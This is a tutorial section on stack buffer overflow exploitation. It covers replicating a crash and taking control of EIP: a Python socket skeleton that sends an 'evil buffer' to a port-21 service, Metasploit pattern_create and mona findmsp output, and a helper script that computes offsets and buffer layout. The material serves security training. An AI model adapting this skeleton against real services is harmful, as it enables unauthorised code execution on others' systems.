# 5. Crash Replication & Controlling EIP

The following skeleton exploit code is used for the rest of the buffer overflow exploit. Add the `send` and `recv` calls the target protocol needs (for example, reading the banner or sending a command before the vulnerable field) in the same way as in the fuzzing step:

```python
import socket

ip = "10.0.0.1"
port = 21

prefix = ""               # anything the protocol needs before the vulnerable field
offset = 0                # distance to the saved EIP, found with the cyclic pattern
overflow = "A" * offset
retn = ""                 # 4-byte return address, little-endian
padding = ""              # filler between retn and where ESP points
payload = ""              # shellcode
postfix = ""              # anything the protocol needs after the field

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # latin-1 maps every character to the same single byte, so a return
    # address or shellcode byte such as "\xaf" goes out as 0xaf. The default
    # UTF-8 encoding would expand it to two bytes and shift every offset.
    s.send((buffer + "\r\n").encode("latin-1"))
    print("Done!")
except socket.error as e:
    print("Could not connect: %s" % e)
finally:
    s.close()
```

Using the buffer length which caused the crash, generate a unique (cyclic) pattern so we can determine the offset in the pattern at which EIP is overwritten, and the offsets that other registers point into. Make the pattern 400 bytes larger than the crash buffer, so we can tell right away whether shellcode fits after the return address. If the larger buffer doesn't crash the application, use a pattern equal to the crash buffer length and add to it in small steps to find the available space. The example below assumes the crash occurred at 200 bytes, giving a 600-byte pattern:

```bash
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
```

Replicate the crash with the pattern in place of the A's. While the pattern is still in memory (before restarting the application), use mona's `findmsp` command with the distance argument set to the pattern length:

```
!mona findmsp -distance 600
...
[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x005f3614 (length 600 bytes)
Cyclic pattern (normal) found at 0x005f4a40 (length 600 bytes)
Cyclic pattern (normal) found at 0x017df764 (length 600 bytes)
EIP contains normal pattern : 0x78413778 (offset 112)
ESP (0x017dfa30) points at offset 116 in normal pattern (length 484)
EAX (0x017df764) points at offset 0 in normal pattern (length 600)
EBP contains normal pattern : 0x41367841 (offset 108)
...
```

Note the EIP offset (112) and the offsets of any other registers that point into the pattern. ESP points at offset 116, i.e. the 4 bytes immediately after the overwritten return address, and the remaining 484 bytes of the pattern lie past it, which is enough space for typical shellcode.

Create a new buffer using this information to ensure that we can control EIP:

```python
prefix = ""
offset = 112                    # EIP offset reported by findmsp
overflow = "A" * offset
retn = "BBBB"                   # lands in EIP as 0x42424242
padding = ""                    # ESP is at 112 + 4 = 116, right after retn: no gap to fill
payload = "C" * (600-112-4)     # 484 bytes, the space findmsp reported after ESP
postfix = ""

# total stays at 600 bytes, the same length as the pattern that crashed it
buffer = prefix + overflow + retn + padding + payload + postfix
```

Crash the application using this buffer and confirm in the debugger that EIP reads `0x42424242` (the B's) and that ESP points to the first C (`\x43`). If ESP instead points some bytes into the C's, the gap between the return address and ESP must be filled with `padding` so that the shellcode later starts exactly where ESP points.
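The following is an added example, not part of the original notes and not the code of Metasploit or mona; it ties the steps of this section together in Python 3. It reproduces the `pattern_create` output, maps a register value back to its offset the way `pattern_offset.rb` and `findmsp` do, then derives the overflow/padding/payload sizes that keep the buffer at the crash length and reports what EIP and ESP should show. The function names are assumptions of this example, and the register values in the demo are constructed by reading the pattern at offsets 112 and 116 rather than taken from the mona listing above, so substitute the hex values from your own crash.

```python
import string
import struct

# Metasploit's default character sets. The digit changes fastest, so the
# pattern reads Aa0Aa1...Aa9Ab0... and every 4-byte window is unique for the
# first 26 * 26 * 10 * 3 = 20280 bytes.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Produce the same bytes as pattern_create.rb -l <length>."""
    out = bytearray()
    for upper in UPPER:
        for lower in LOWER:
            for digit in DIGITS:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte cyclic pattern")


def pattern_offset(pattern, value):
    """Offset of a register value in the pattern, as pattern_offset.rb or
    mona findmsp report it. An int is packed little-endian: the debugger shows
    EIP as 0x78413778 while the stack holds the bytes 78 37 41 78 in that
    order, so the value must be reversed before searching the pattern."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("value not found in pattern")
    return idx


def plan_layout(crash_len, eip_offset, esp_offset):
    """Sizes of overflow, padding and payload that keep the buffer at
    crash_len bytes. padding fills the gap when ESP does not point at the
    byte right after the overwritten return address."""
    if esp_offset < eip_offset + 4:
        raise ValueError("ESP points into or before the return address")
    if esp_offset > crash_len:
        raise ValueError("ESP points past the end of the buffer")
    return {
        "overflow": eip_offset,
        "padding": esp_offset - eip_offset - 4,
        "payload": crash_len - esp_offset,
    }


def build_buffer(layout, retn, prefix=b"", postfix=b""):
    """Assemble the EIP-control buffer as bytes. Keeping everything as bytes
    (rather than str) means a return address containing bytes above 0x7f
    reaches the socket unchanged instead of being UTF-8 encoded."""
    if len(retn) != 4:
        raise ValueError("retn must be exactly 4 bytes on 32-bit x86")
    return (prefix
            + b"A" * layout["overflow"]
            + retn
            + b"D" * layout["padding"]
            + b"C" * layout["payload"]
            + postfix)


def expected_registers(buf, layout, prefix_len=0):
    """What the debugger should show after the crash: the value in EIP and
    the first 4 bytes at the address ESP points to."""
    eip_at = prefix_len + layout["overflow"]
    esp_at = eip_at + 4 + layout["padding"]
    eip = struct.unpack("<I", buf[eip_at:eip_at + 4])[0]
    return eip, buf[esp_at:esp_at + 4]


if __name__ == "__main__":
    pattern = pattern_create(600)
    # Constructed register values: read straight out of the pattern at the
    # offsets mona reported on this page (EIP 112, ESP 116). Replace them with
    # the hex values from your own crash.
    eip_value = struct.unpack("<I", pattern[112:116])[0]
    esp_value = struct.unpack("<I", pattern[116:120])[0]
    eip_off = pattern_offset(pattern, eip_value)
    esp_off = pattern_offset(pattern, esp_value)
    layout = plan_layout(600, eip_off, esp_off)
    buf = build_buffer(layout, b"BBBB")
    print("EIP offset %d, ESP offset %d, layout %s" % (eip_off, esp_off, layout))
    print("EIP should read 0x%08x, ESP should point at %r"
          % expected_registers(buf, layout))
```

Run it and compare the printed layout with the buffer in the previous block: with ESP at offset 116 the padding is zero, which is why `padding` is empty there. If `findmsp` reports ESP further into the pattern, `plan_layout` sizes the padding so the payload still starts exactly where ESP points, and the total stays at the crash length.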
